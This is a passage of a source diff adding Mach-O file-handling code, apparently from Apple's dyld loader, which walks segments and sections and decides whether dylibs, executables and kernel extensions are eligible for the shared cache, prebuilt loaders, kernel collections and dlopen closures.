^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* segCmd = (segment_command_64*)cmd; + uint64_t sizeOfSections = segCmd->vmsize; + uint8_t p2align = 0; + const section_64* const sectionsStart = (section_64*)((char*)segCmd + sizeof(struct segment_command_64)); + const section_64* const sectionsEnd = §ionsStart[segCmd->nsects]; + for (const section_64* sect=sectionsStart; sect < sectionsEnd; ++sect) { + sizeOfSections = sect->addr + sect->size - segCmd->vmaddr; + if ( sect->align > p2align ) + p2align = sect->align; + } + SegmentInfo info; + info.fileOffset = segCmd->fileoff; + info.fileSize = segCmd->filesize; + info.vmAddr = segCmd->vmaddr; + info.vmSize = segCmd->vmsize; + info.sizeOfSections = sizeOfSections; + info.segName = segCmd->segname; + 
info.loadCommandOffset = (uint32_t)((uint8_t*)segCmd - (uint8_t*)this); + info.protections = segCmd->initprot; + info.textRelocs = false; + info.readOnlyData = ((segCmd->flags & SG_READ_ONLY) != 0); + info.isProtected = (segCmd->flags & SG_PROTECTED_VERSION_1) ? 1 : 0; + info.hasZeroFill = (segCmd->initprot == 3) && (segCmd->filesize < segCmd->vmsize); + info.p2align = p2align; + info.segIndex = segIndex; + callback(info, stop); + ++segIndex; + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* segCmd = (segment_command*)cmd; + uint64_t sizeOfSections = segCmd->vmsize; + uint8_t p2align = 0; + bool hasTextRelocs = false; + const section* const sectionsStart = (section*)((char*)segCmd + sizeof(struct segment_command)); + const section* const sectionsEnd = &sectionsStart[segCmd->nsects]; + for (const section* sect=sectionsStart; sect < sectionsEnd; ++sect) { + sizeOfSections = sect->addr + sect->size - segCmd->vmaddr; + if ( sect->align > p2align ) + p2align = sect->align; + if ( sect->flags & (S_ATTR_EXT_RELOC|S_ATTR_LOC_RELOC) ) + hasTextRelocs = true; + } + SegmentInfo info; + info.fileOffset = segCmd->fileoff; + info.fileSize = segCmd->filesize; + info.vmAddr = segCmd->vmaddr; + info.vmSize = segCmd->vmsize; + info.sizeOfSections = sizeOfSections; + info.segName = segCmd->segname; + info.loadCommandOffset = (uint32_t)((uint8_t*)segCmd - (uint8_t*)this); + info.protections = segCmd->initprot; + info.textRelocs = intel32 && !info.writable() && hasTextRelocs; + info.readOnlyData = ((segCmd->flags & SG_READ_ONLY) != 0); + info.isProtected = (segCmd->flags & SG_PROTECTED_VERSION_1) ? 
1 : 0; + info.hasZeroFill = (segCmd->initprot == 3) && (segCmd->filesize < segCmd->vmsize); + info.p2align = p2align; + info.segIndex = segIndex; + callback(info, stop); + ++segIndex; + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + +uint64_t MachOFile::preferredLoadAddress() const +{ + __block uint64_t textVmAddr = 0; + forEachSegment(^(const SegmentInfo& info, bool& stop) { + if ( strcmp(info.segName, "__TEXT") == 0 ) { + textVmAddr = info.vmAddr; + stop = true; + } + }); + return textVmAddr; +} + +void MachOFile::forEachSection(void (^callback)(const SectionInfo& sectInfo, bool malformedSectionRange, bool& stop)) const +{ + Diagnostics diag; + BLOCK_ACCCESSIBLE_ARRAY(char, sectNameCopy, 20); // read as: char sectNameCopy[20]; + const bool intel32 = (this->cputype == CPU_TYPE_I386); + __block uint32_t segIndex = 0; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + SectionInfo sectInfo; + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* segCmd = (segment_command_64*)cmd; + uint64_t sizeOfSections = segCmd->vmsize; + uint8_t p2align = 0; + const section_64* const sectionsStart = (section_64*)((char*)segCmd + sizeof(struct segment_command_64)); + const section_64* const sectionsEnd = &sectionsStart[segCmd->nsects]; + for (const section_64* sect=sectionsStart; sect < sectionsEnd; ++sect) { + sizeOfSections = sect->addr + sect->size - segCmd->vmaddr; + if ( sect->align > p2align ) + p2align = sect->align; + } + sectInfo.segInfo.fileOffset = segCmd->fileoff; + sectInfo.segInfo.fileSize = segCmd->filesize; + sectInfo.segInfo.vmAddr = segCmd->vmaddr; + sectInfo.segInfo.vmSize = segCmd->vmsize; + sectInfo.segInfo.sizeOfSections = sizeOfSections; + sectInfo.segInfo.segName = segCmd->segname; + sectInfo.segInfo.loadCommandOffset = (uint32_t)((uint8_t*)segCmd - (uint8_t*)this); + sectInfo.segInfo.protections = segCmd->initprot; + sectInfo.segInfo.textRelocs = false; + 
sectInfo.segInfo.readOnlyData = ((segCmd->flags & SG_READ_ONLY) != 0); + sectInfo.segInfo.isProtected = (segCmd->flags & SG_PROTECTED_VERSION_1) ? 1 : 0; + sectInfo.segInfo.p2align = p2align; + sectInfo.segInfo.segIndex = segIndex; + for (const section_64* sect=sectionsStart; !stop && (sect < sectionsEnd); ++sect) { + const char* sectName = sect->sectname; + if ( sectName[15] != '\0' ) { + strlcpy(sectNameCopy, sectName, 17); + sectName = sectNameCopy; + } + bool malformedSectionRange = (sect->addr < segCmd->vmaddr) || greaterThanAddOrOverflow(sect->addr, sect->size, segCmd->vmaddr + segCmd->filesize); + sectInfo.sectName = sectName; + sectInfo.sectFileOffset = sect->offset; + sectInfo.sectFlags = sect->flags; + sectInfo.sectAddr = sect->addr; + sectInfo.sectSize = sect->size; + sectInfo.sectAlignP2 = sect->align; + sectInfo.reserved1 = sect->reserved1; + sectInfo.reserved2 = sect->reserved2; + callback(sectInfo, malformedSectionRange, stop); + } + ++segIndex; + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* segCmd = (segment_command*)cmd; + uint64_t sizeOfSections = segCmd->vmsize; + uint8_t p2align = 0; + bool hasTextRelocs = false; + const section* const sectionsStart = (section*)((char*)segCmd + sizeof(struct segment_command)); + const section* const sectionsEnd = &sectionsStart[segCmd->nsects]; + for (const section* sect=sectionsStart; sect < sectionsEnd; ++sect) { + sizeOfSections = sect->addr + sect->size - segCmd->vmaddr; + if ( sect->align > p2align ) + p2align = sect->align; + if ( sect->flags & (S_ATTR_EXT_RELOC|S_ATTR_LOC_RELOC) ) + hasTextRelocs = true; + } + sectInfo.segInfo.fileOffset = segCmd->fileoff; + sectInfo.segInfo.fileSize = segCmd->filesize; + sectInfo.segInfo.vmAddr = segCmd->vmaddr; + sectInfo.segInfo.vmSize = segCmd->vmsize; + sectInfo.segInfo.sizeOfSections = sizeOfSections; + sectInfo.segInfo.segName = segCmd->segname; + sectInfo.segInfo.loadCommandOffset = (uint32_t)((uint8_t*)segCmd - (uint8_t*)this); + 
sectInfo.segInfo.protections = segCmd->initprot; + sectInfo.segInfo.textRelocs = intel32 && !sectInfo.segInfo.writable() && hasTextRelocs; + sectInfo.segInfo.readOnlyData = ((segCmd->flags & SG_READ_ONLY) != 0); + sectInfo.segInfo.isProtected = (segCmd->flags & SG_PROTECTED_VERSION_1) ? 1 : 0; + sectInfo.segInfo.p2align = p2align; + sectInfo.segInfo.segIndex = segIndex; + for (const section* sect=sectionsStart; !stop && (sect < sectionsEnd); ++sect) { + const char* sectName = sect->sectname; + if ( sectName[15] != '\0' ) { + strlcpy(sectNameCopy, sectName, 17); + sectName = sectNameCopy; + } + bool malformedSectionRange = (sect->addr < segCmd->vmaddr) || greaterThanAddOrOverflow(sect->addr, sect->size, segCmd->vmaddr + segCmd->filesize); + sectInfo.sectName = sectName; + sectInfo.sectFileOffset = sect->offset; + sectInfo.sectFlags = sect->flags; + sectInfo.sectAddr = sect->addr; + sectInfo.sectSize = sect->size; + sectInfo.sectAlignP2 = sect->align; + sectInfo.reserved1 = sect->reserved1; + sectInfo.reserved2 = sect->reserved2; + callback(sectInfo, malformedSectionRange, stop); + } + ++segIndex; + } + }); + diag.assertNoError(); // any malformations in the file should have been caught by earlier validate() call +} + +void MachOFile::forEachInterposingSection(Diagnostics& diag, void (^handler)(uint64_t vmOffset, uint64_t vmSize, bool& stop)) const +{ + const unsigned ptrSize = pointerSize(); + const unsigned entrySize = 2 * ptrSize; + forEachSection(^(const MachOFile::SectionInfo& info, bool malformedSectionRange, bool &stop) { + if ( ((info.sectFlags & SECTION_TYPE) == S_INTERPOSING) || ((strcmp(info.sectName, "__interpose") == 0) && ((strncmp(info.segInfo.segName, "__DATA", 6) == 0) || strncmp(info.segInfo.segName, "__AUTH", 6) == 0)) ) { + if ( info.sectSize % entrySize != 0 ) { + diag.error("interposing section %s/%s has bad size", info.segInfo.segName, info.sectName); + stop = true; + return; + } + if ( malformedSectionRange ) { + diag.error("interposing 
section %s/%s extends beyond the end of the segment", info.segInfo.segName, info.sectName); + stop = true; + return; + } + if ( (info.sectAddr % ptrSize) != 0 ) { + diag.error("interposing section %s/%s is not pointer aligned", info.segInfo.segName, info.sectName); + stop = true; + return; + } + handler(info.sectAddr - preferredLoadAddress(), info.sectSize, stop); + } + }); +} + +bool MachOFile::isRestricted() const +{ + __block bool result = false; + forEachSection(^(const MachOFile::SectionInfo& info, bool malformedSectionRange, bool &stop) { + if ( (strcmp(info.segInfo.segName, "__RESTRICT") == 0) && (strcmp(info.sectName, "__restrict") == 0) ) { + result = true; + stop = true; + } + }); + return result; +} + +bool MachOFile::hasWeakDefs() const +{ + return (this->flags & MH_WEAK_DEFINES); +} + +bool MachOFile::usesWeakDefs() const +{ + return (this->flags & MH_BINDS_TO_WEAK); +} + +bool MachOFile::hasThreadLocalVariables() const +{ + return (this->flags & MH_HAS_TLV_DESCRIPTORS); +} + +#if BUILDING_CACHE_BUILDER || BUILDING_CACHE_BUILDER_UNIT_TESTS +static bool endsWith(const char* str, const char* suffix) +{ + size_t strLen = strlen(str); + size_t suffixLen = strlen(suffix); + if ( strLen < suffixLen ) + return false; + return (strcmp(&str[strLen-suffixLen], suffix) == 0); +} + +bool MachOFile::isSharedCacheEligiblePath(const char* dylibName) { + return ( (strncmp(dylibName, "/usr/lib/", 9) == 0) + || (strncmp(dylibName, "/System/Library/", 16) == 0) + || (strncmp(dylibName, "/System/iOSSupport/usr/lib/", 27) == 0) + || (strncmp(dylibName, "/System/iOSSupport/System/Library/", 34) == 0) + || (strncmp(dylibName, "/Library/Apple/usr/lib/", 23) == 0) + || (strncmp(dylibName, "/Library/Apple/System/Library/", 30) == 0) + || (strncmp(dylibName, "/System/DriverKit/", 18) == 0) + || (strncmp(dylibName, "/System/Cryptexes/OS/usr/lib/", 29) == 0) + || (strncmp(dylibName, "/System/Cryptexes/OS/System/Library/", 36) == 0) + || (strncmp(dylibName, 
"/System/Cryptexes/OS/System/iOSSupport/usr/lib/", 47) == 0) + || (strncmp(dylibName, "/System/Cryptexes/OS/System/iOSSupport/System/Library/", 54) == 0)); +} + +static bool startsWith(const char* buffer, const char* valueToFind) { + return strncmp(buffer, valueToFind, strlen(valueToFind)) == 0; +} + +static bool platformExcludesSharedCache_macOS(const char* installName) { + // Note: This function basically matches dontCache() from update dyld shared cache + + if ( startsWith(installName, "/usr/lib/system/introspection/") ) + return true; + if ( startsWith(installName, "/System/Library/QuickTime/") ) + return true; + if ( startsWith(installName, "/System/Library/Tcl/") ) + return true; + if ( startsWith(installName, "/System/Library/Perl/") ) + return true; + if ( startsWith(installName, "/System/Library/MonitorPanels/") ) + return true; + if ( startsWith(installName, "/System/Library/Accessibility/") ) + return true; + if ( startsWith(installName, "/usr/local/") ) + return true; + if ( startsWith(installName, "/usr/lib/pam/") ) + return true; + // We no longer support ROSP, so skip all paths which start with the special prefix + if ( startsWith(installName, "/System/Library/Templates/Data/") ) + return true; + + // anything inside a .app bundle is specific to app, so should not be in shared cache + if ( strstr(installName, ".app/") != NULL ) + return true; + + // Depends on UHASHelloExtensionPoint-macOS which is not always cache eligible + if ( !strcmp(installName, "/System/Library/PrivateFrameworks/HelloWorldMacHelper.framework/Versions/A/HelloWorldMacHelper") ) + return true; + + return false; +} + +static bool platformExcludesSharedCache_iOS(const char* installName) { + if ( strcmp(installName, "/System/Library/Caches/com.apple.xpc/sdk.dylib") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/Caches/com.apple.xpcd/xpcd_cache.dylib") == 0 ) + return true; + return false; +} + +// HACK: Remove this function. 
Its only here until we can handle cache overflow +static bool platformExcludesSharedCache_sim(const char* installName) { + if ( startsWith(installName, "/System/Library/PrivateFrameworks/iWorkImport.framework/") ) + return true; + if ( startsWith(installName, "/System/Library/PrivateFrameworks/News") ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/StocksUI.framework/StocksUI") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/NewsUI.framework/NewsUI") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/CompassUI.framework/CompassUI") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/WeatherUI.framework/WeatherUI") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/NewsUI2.framework/NewsUI2") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/MLCompilerOS.framework/MLCompilerOS") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/HomeKitDaemon.framework/HomeKitDaemon") == 0 ) + return true; + if ( strcmp(installName, "/System/Library/PrivateFrameworks/HomeKitDaemonLegacy.framework/HomeKitDaemonLegacy") == 0 ) + return true; + return false; +} + +// Returns true if the current platform requires that this install name be excluded from the shared cache +// Note that this overrides any exclusion from anywhere else. 
+static bool platformExcludesSharedCache(Platform platform, const char* installName) { + if ( MachOFile::isSimulatorPlatform(platform) ) + return platformExcludesSharedCache_sim(installName); + if ( (platform == dyld3::Platform::macOS) || (platform == dyld3::Platform::iOSMac) ) + return platformExcludesSharedCache_macOS(installName); + // Everything else is based on iOS so just use that value + return platformExcludesSharedCache_iOS(installName); +} + +bool MachOFile::canBePlacedInDyldCache(const char* path, void (^failureReason)(const char*)) const +{ + if ( !isSharedCacheEligiblePath(path) ) { + // Dont spam the user with an error about paths when we know these are never eligible. + return false; + } + + // only dylibs can go in cache + if ( !this->isDylib() && !this->isDyld() ) { + failureReason("Not MH_DYLIB"); + return false; // cannot continue, installName() will assert() if not a dylib + } + + + const char* dylibName = installName(); + if ( dylibName[0] != '/' ) { + failureReason("install name not an absolute path"); + // Don't continue as we don't want to spam the log with errors we don't need. 
+ return false; + } + else if ( strcmp(dylibName, path) != 0 ) { + failureReason("install path does not match install name"); + return false; + } + else if ( strstr(dylibName, "//") != 0 ) { + failureReason("install name should not include //"); + return false; + } + else if ( strstr(dylibName, "./") != 0 ) { + failureReason("install name should not include ./"); + return false; + } + + __block bool platformExcludedFile = false; + forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + if ( platformExcludedFile ) + return; + if ( platformExcludesSharedCache(platform, dylibName) ) { + platformExcludedFile = true; + return; + } + }); + if ( platformExcludedFile ) { + failureReason("install name is not shared cache eligible on platform"); + return false; + } + + // flat namespace files cannot go in cache + if ( (this->flags & MH_TWOLEVEL) == 0 ) { + failureReason("Not built with two level namespaces"); + return false; + } + + // don't put debug variants into dyld cache + if ( endsWith(path, "_profile.dylib") || endsWith(path, "_debug.dylib") || endsWith(path, "_asan.dylib") + || endsWith(path, "_profile") || endsWith(path, "_debug") || endsWith(path, "/CoreADI") ) { + failureReason("Variant image"); + return false; + } + + // dylib must have extra info for moving DATA and TEXT segments apart + __block bool hasExtraInfo = false; + __block bool hasDyldInfo = false; + __block bool hasExportTrie = false; + __block Diagnostics diag; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_SPLIT_INFO ) + hasExtraInfo = true; + if ( cmd->cmd == LC_DYLD_INFO_ONLY ) + hasDyldInfo = true; + if ( cmd->cmd == LC_DYLD_EXPORTS_TRIE ) + hasExportTrie = true; + }); + if ( !hasExtraInfo ) { + std::string_view ignorePaths[] = { + "/usr/lib/libobjc-trampolines.dylib", + "/usr/lib/libffi-trampolines.dylib" + }; + for ( std::string_view ignorePath : ignorePaths ) { + if ( ignorePath == path ) + return false; + } + 
failureReason("Missing split seg info"); + return false; + } + if ( !hasDyldInfo && !hasExportTrie ) { + failureReason("Old binary, missing dyld info or export trie"); + return false; + } + + // dylib can only depend on other dylibs in the shared cache + __block bool allDepPathsAreGood = true; + forEachDependentDylib(^(const char* loadPath, bool isWeak, bool isReExport, bool isUpward, uint32_t compatVersion, uint32_t curVersion, bool& stop) { + // Skip weak links. They are allowed to be missing + if ( isWeak ) + return; + if ( !isSharedCacheEligiblePath(loadPath) ) { + allDepPathsAreGood = false; + stop = true; + } + }); + if ( !allDepPathsAreGood ) { + failureReason("Depends on dylibs ineligable for dyld cache"); + return false; + } + + // dylibs with interposing info cannot be in cache + if ( hasInterposingTuples() ) { + failureReason("Has interposing tuples"); + return false; + } + + // Temporarily kick out swift binaries out of dyld cache on watchOS simulators as they have missing split seg + if ( (this->cputype == CPU_TYPE_I386) && builtForPlatform(Platform::watchOS_simulator) ) { + if ( strncmp(dylibName, "/usr/lib/swift/", 15) == 0 ) { + failureReason("i386 swift binary"); + return false; + } + } + + // These used to be in MachOAnalyzer + __block bool passedLinkeditChecks = false; + this->withFileLayout(diag, ^(const mach_o::Layout &layout) { + + mach_o::SplitSeg splitSeg(layout); + mach_o::Fixups fixups(layout); + + // arm64e requires split seg v2 as the split seg code can't handle chained fixups for split seg v1 + if ( isArch("arm64e") ) { + if ( !splitSeg.isV2() ) { + failureReason("chained fixups requires split seg v2"); + return; + } + } + + // evict swift dylibs with split seg v1 info + if ( layout.isSwiftLibrary() && splitSeg.isV1() ) + return; + + if ( splitSeg.isV1() ) { + // Split seg v1 can only support 1 __DATA, and no other writable segments + __block bool foundBadSegment = false; + forEachSegment(^(const SegmentInfo& info, bool& stop) { + if ( 
info.protections == (VM_PROT_READ | VM_PROT_WRITE) ) { + if ( strcmp(info.segName, "__DATA") == 0 ) + return; + + failureReason("RW segments other than __DATA requires split seg v2"); + foundBadSegment = true; + stop = true; + } + }); + + if ( foundBadSegment ) + return; + } + + // dyld_cache_patchable_location only supports addend in range 0..31 + // rdar://96164956 (dyld needs to support arbitrary addends in cache patch table) + const bool is64bit = is64(); + __block bool addendTooLarge = false; + const uint64_t tooLargeRegularAddend = 1 << 23; + const uint64_t tooLargeAuthAddend = 1 << 5; + if ( this->hasChainedFixups() ) { + + // with chained fixups, addends can be in the import table or embedded in a bind pointer + __block std::vector<uint64_t> targetAddends; + fixups.forEachChainedFixupTarget(diag, ^(int libOrdinal, const char* symbolName, uint64_t addend, bool weakImport, bool& stop) { + if ( is64bit ) + addend &= 0x00FFFFFFFFFFFFFF; // ignore TBI + targetAddends.push_back(addend); + }); + // check each pointer for embedded addend + fixups.withChainStarts(diag, ^(const dyld_chained_starts_in_image* starts) { + fixups.forEachFixupInAllChains(diag, starts, false, ^(mach_o::ChainedFixupPointerOnDisk* fixupLoc, uint64_t fixupSegmentOffset, const dyld_chained_starts_in_segment* segInfo, bool& stop) { + switch (segInfo->pointer_format) { + case DYLD_CHAINED_PTR_ARM64E: + case DYLD_CHAINED_PTR_ARM64E_USERLAND: + if ( fixupLoc->arm64e.bind.bind ) { + uint64_t ordinal = fixupLoc->arm64e.bind.ordinal; + uint64_t addend = (ordinal < targetAddends.size()) ? 
targetAddends[ordinal] : 0; + if ( fixupLoc->arm64e.bind.auth ) { + if ( addend >= tooLargeAuthAddend ) { + addendTooLarge = true; + stop = true; + } + } else { + addend += fixupLoc->arm64e.signExtendedAddend(); + if ( addend >= tooLargeRegularAddend ) { + addendTooLarge = true; + stop = true; + } + } + } + break; + case DYLD_CHAINED_PTR_ARM64E_USERLAND24: + if ( fixupLoc->arm64e.bind24.bind ) { + uint64_t ordinal = fixupLoc->arm64e.bind24.ordinal; + uint64_t addend = (ordinal < targetAddends.size()) ? targetAddends[ordinal] : 0; + if ( fixupLoc->arm64e.bind24.auth ) { + if ( addend >= tooLargeAuthAddend ) { + addendTooLarge = true; + stop = true; + } + } else { + addend += fixupLoc->arm64e.signExtendedAddend(); + if ( addend >= tooLargeRegularAddend ) { + addendTooLarge = true; + stop = true; + } + } + } + break; + case DYLD_CHAINED_PTR_64: + case DYLD_CHAINED_PTR_64_OFFSET: { + if ( fixupLoc->generic64.rebase.bind ) { + uint64_t ordinal = fixupLoc->generic64.bind.ordinal; + uint64_t addend = (ordinal < targetAddends.size()) ? targetAddends[ordinal] : 0; + addend += fixupLoc->generic64.bind.addend; + if ( addend >= tooLargeRegularAddend ) { + addendTooLarge = true; + stop = true; + } + } + break; + } + case DYLD_CHAINED_PTR_32: + if ( fixupLoc->generic32.bind.bind ) { + uint64_t ordinal = fixupLoc->generic32.bind.ordinal; + uint64_t addend = (ordinal < targetAddends.size()) ? 
targetAddends[ordinal] : 0; + addend += fixupLoc->generic32.bind.addend; + if ( addend >= tooLargeRegularAddend ) { + addendTooLarge = true; + stop = true; + } + } + break; + } + }); + }); + } + else { + // scan bind opcodes for large addend + auto handler = ^(const mach_o::Fixups::BindTargetInfo &info, bool &stop) { + uint64_t addend = info.addend; + if ( is64bit ) + addend &= 0x00FFFFFFFFFFFFFF; // ignore TBI + if ( addend >= tooLargeRegularAddend ) { + addendTooLarge = true; + stop = true; + } + }; + fixups.forEachBindTarget_Opcodes(diag, true, handler, handler); + } + if ( addendTooLarge ) { + failureReason("bind addend too large"); + return; + } + + if ( (isArch("x86_64") || isArch("x86_64h")) ) { + __block bool rebasesOk = true; + uint64_t startVMAddr = preferredLoadAddress(); + uint64_t endVMAddr = startVMAddr + mappedSize(); + fixups.forEachRebase(diag, ^(uint64_t runtimeOffset, uint64_t rebasedValue, bool &stop) { + // We allow TBI for x86_64 dylibs, but then require that the remainder of the offset + // is a 32-bit offset from the mach-header. 
+ rebasedValue &= 0x00FFFFFFFFFFFFFFULL; + if ( (rebasedValue < startVMAddr) || (rebasedValue >= endVMAddr) ) { + failureReason("rebase value out of range of dylib"); + rebasesOk = false; + stop = true; + return; + } + + // Also error if the rebase location is anything other than 4/8 byte aligned + if ( (runtimeOffset & 0x3) != 0 ) { + failureReason("rebase value is not 4-byte aligned"); + rebasesOk = false; + stop = true; + return; + } + + // Error if the fixup will cross a page + if ( (runtimeOffset & 0xFFF) == 0xFFC ) { + failureReason("rebase value crosses page boundary"); + rebasesOk = false; + stop = true; + return; + } + }); + + if ( !rebasesOk ) + return; + + if ( this->hasChainedFixups() ) { + fixups.withChainStarts(diag, ^(const dyld_chained_starts_in_image* starts) { + fixups.forEachFixupInAllChains(diag, starts, false, ^(mach_o::ChainedFixupPointerOnDisk* fixupLoc, uint64_t fixupSegmentOffset, const dyld_chained_starts_in_segment* segInfo, bool& stop) { + if ( (fixupSegmentOffset & 0xFFF) == 0xFFC ) { + failureReason("chained fixup crosses page boundary"); + rebasesOk = false; + stop = true; + return; + } + }); + }); + } + + if ( !rebasesOk ) + return; + } + + // Check that shared cache dylibs don't use undefined lookup + { + __block bool bindsOk = true; + + auto checkBind = ^(int libOrdinal, bool& stop) { + if ( libOrdinal == BIND_SPECIAL_DYLIB_FLAT_LOOKUP ) { + failureReason("has dynamic_lookup binds"); + bindsOk = false; + stop = true; + } + }; + + if (hasChainedFixups()) { + fixups.forEachChainedFixupTarget(diag, ^(int libOrdinal, const char* symbolName, uint64_t addend, bool weakImport, bool& stop) { + checkBind(libOrdinal, stop); + }); + } else { + auto handler = ^(const mach_o::Fixups::BindTargetInfo &info, bool &stop) { + checkBind(info.libOrdinal, stop); + }; + fixups.forEachBindTarget_Opcodes(diag, true, handler, handler); + } + + if ( !bindsOk ) + return; + } + + passedLinkeditChecks = true; + }); + + return passedLinkeditChecks; +} + +// 
Returns true if the executable path is eligible for a PrebuiltLoader on the given platform. +bool MachOFile::canHavePrebuiltExecutableLoader(dyld3::Platform platform, const std::string_view& path, + void (^failureReason)(const char*)) const +{ + // For now we can't build prebuilt loaders for the simulator + if ( isSimulatorPlatform(platform) ) { + // Don't spam with tons of messages about executables + return false; + } + + if ( (platform == dyld3::Platform::macOS) || (platform == dyld3::Platform::iOSMac) ) { + // We no longer support ROSP, so skip all paths which start with the special prefix + if ( path.starts_with("/System/Library/Templates/Data/") ) { + // Dont spam the user with an error about paths when we know these are never eligible. + return false; + } + + static const char* sAllowedPrefixes[] = { + "/bin/", + "/sbin/", + "/usr/", + "/System/", + "/Library/Apple/System/", + "/Library/Apple/usr/", + "/System/Applications/Safari.app/", + "/Library/CoreMediaIO/Plug-Ins/DAL/" // temp until plugins moved or closured working + }; + + bool inSearchDir = false; + for ( const char* searchDir : sAllowedPrefixes ) { + if ( path.starts_with(searchDir) ) { + inSearchDir = true; + break; + } + } + + if ( !inSearchDir ) { + failureReason("path not eligible"); + return false; + } + } else { + // On embedded, only staged apps are excluded. They will run from a different location at runtime + if ( path.find("/staged_system_apps/") != std::string::npos ) { + // Dont spam the user with an error about paths when we know these are never eligible. 
+ return false; + } + } + + if ( !hasCodeSignature() ) { + failureReason("missing code signature"); + return false; + } + + return true; +} +#endif + +#if BUILDING_APP_CACHE_UTIL +bool MachOFile::canBePlacedInKernelCollection(const char* path, void (^failureReason)(const char*)) const +{ + // only dylibs and the kernel itself can go in cache + if ( this->filetype == MH_EXECUTE ) { + // xnu + } else if ( this->isKextBundle() ) { + // kext's + } else { + failureReason("Not MH_KEXT_BUNDLE"); + return false; + } + + if ( this->filetype == MH_EXECUTE ) { + // xnu + + // two-level namespace binaries cannot go in cache + if ( (this->flags & MH_TWOLEVEL) != 0 ) { + failureReason("Built with two level namespaces"); + return false; + } + + // xnu kernel cannot have a page zero + __block bool foundPageZero = false; + forEachSegment(^(const SegmentInfo &segmentInfo, bool &stop) { + if ( strcmp(segmentInfo.segName, "__PAGEZERO") == 0 ) { + foundPageZero = true; + stop = true; + } + }); + if (foundPageZero) { + failureReason("Has __PAGEZERO"); + return false; + } + + // xnu must have an LC_UNIXTHREAD to point to the entry point + __block bool foundMainLC = false; + __block bool foundUnixThreadLC = false; + Diagnostics diag; + forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_MAIN ) { + foundMainLC = true; + stop = true; + } + else if ( cmd->cmd == LC_UNIXTHREAD ) { + foundUnixThreadLC = true; + } + }); + if (foundMainLC) { + failureReason("Found LC_MAIN"); + return false; + } + if (!foundUnixThreadLC) { + failureReason("Expected LC_UNIXTHREAD"); + return false; + } + + if (diag.hasError()) { + failureReason("Error parsing load commands"); + return false; + } + + // The kernel should be a static executable, not a dynamic one + if ( !isStaticExecutable() ) { + failureReason("Expected static executable"); + return false; + } + + // The kernel must be built with -pie + if ( !isPIE() ) { + failureReason("Expected pie"); + return false; + } + } + 
+ if ( isArch("arm64e") && isKextBundle() && !hasChainedFixups() ) { + failureReason("Missing fixup information"); + return false; + } + + // dylibs with interposing info cannot be in cache + if ( hasInterposingTuples() ) { + failureReason("Has interposing tuples"); + return false; + } + + // Only x86_64 is allowed to have RWX segments + if ( !isArch("x86_64") && !isArch("x86_64h") ) { + __block bool foundBadSegment = false; + forEachSegment(^(const SegmentInfo &info, bool &stop) { + if ( (info.protections & (VM_PROT_WRITE | VM_PROT_EXECUTE)) == (VM_PROT_WRITE | VM_PROT_EXECUTE) ) { + failureReason("Segments are not allowed to be both writable and executable"); + foundBadSegment = true; + stop = true; + } + }); + if ( foundBadSegment ) + return false; + } + + return true; +} + +bool MachOFile::usesClassicRelocationsInKernelCollection() const { + // The xnu x86_64 static executable needs to do the i386->x86_64 transition + // so will be emitted with classic relocations + if ( isArch("x86_64") || isArch("x86_64h") ) { + return isStaticExecutable() || isFileSet(); + } + return false; +} +#endif + +#if BUILDING_CACHE_BUILDER || BUILDING_CACHE_BUILDER_UNIT_TESTS +static bool platformExcludesPrebuiltClosure_macOS(const char* path) { + // We no longer support ROSP, so skip all paths which start with the special prefix + if ( startsWith(path, "/System/Library/Templates/Data/") ) + return true; + + // anything inside a .app bundle is specific to app, so should not get a prebuilt closure + if ( strstr(path, ".app/") != NULL ) + return true; + + return false; +} + +static bool platformExcludesPrebuiltClosure_iOS(const char* path) { + if ( strcmp(path, "/System/Library/Caches/com.apple.xpc/sdk.dylib") == 0 ) + return true; + if ( strcmp(path, "/System/Library/Caches/com.apple.xpcd/xpcd_cache.dylib") == 0 ) + return true; + return false; +} + +// Returns true if the current platform requires that this install name be excluded from the shared cache +// Note that this overrides 
any exclusion from anywhere else. +static bool platformExcludesPrebuiltClosure(Platform platform, const char* path) { + if ( MachOFile::isSimulatorPlatform(platform) ) + return false; + if ( (platform == dyld3::Platform::macOS) || (platform == dyld3::Platform::iOSMac) ) + return platformExcludesPrebuiltClosure_macOS(path); + // Everything else is based on iOS so just use that value + return platformExcludesPrebuiltClosure_iOS(path); +} + +bool MachOFile::canHavePrecomputedDlopenClosure(const char* path, void (^failureReason)(const char*)) const +{ + __block bool retval = true; + + // only dylibs can go in cache + if ( (this->filetype != MH_DYLIB) && (this->filetype != MH_BUNDLE) ) { + retval = false; + failureReason("not MH_DYLIB or MH_BUNDLE"); + } + + // flat namespace files cannot go in cache + if ( (this->flags & MH_TWOLEVEL) == 0 ) { + retval = false; + failureReason("not built with two level namespaces"); + } + + // can only depend on other dylibs with absolute paths + __block bool allDepPathsAreGood = true; + forEachDependentDylib(^(const char* loadPath, bool isWeak, bool isReExport, bool isUpward, uint32_t compatVersion, uint32_t curVersion, bool& stop) { + if ( loadPath[0] != '/' ) { + allDepPathsAreGood = false; + stop = true; + } + }); + if ( !allDepPathsAreGood ) { + retval = false; + failureReason("depends on dylibs that are not absolute paths"); + } + + __block bool platformExcludedFile = false; + forEachSupportedPlatform(^(Platform platform, uint32_t minOS, uint32_t sdk) { + if ( platformExcludedFile ) + return; + if ( platformExcludesPrebuiltClosure(platform, path) ) { + platformExcludedFile = true; + return; + } + }); + if ( platformExcludedFile ) { + failureReason("file cannot get a prebuilt closure on this 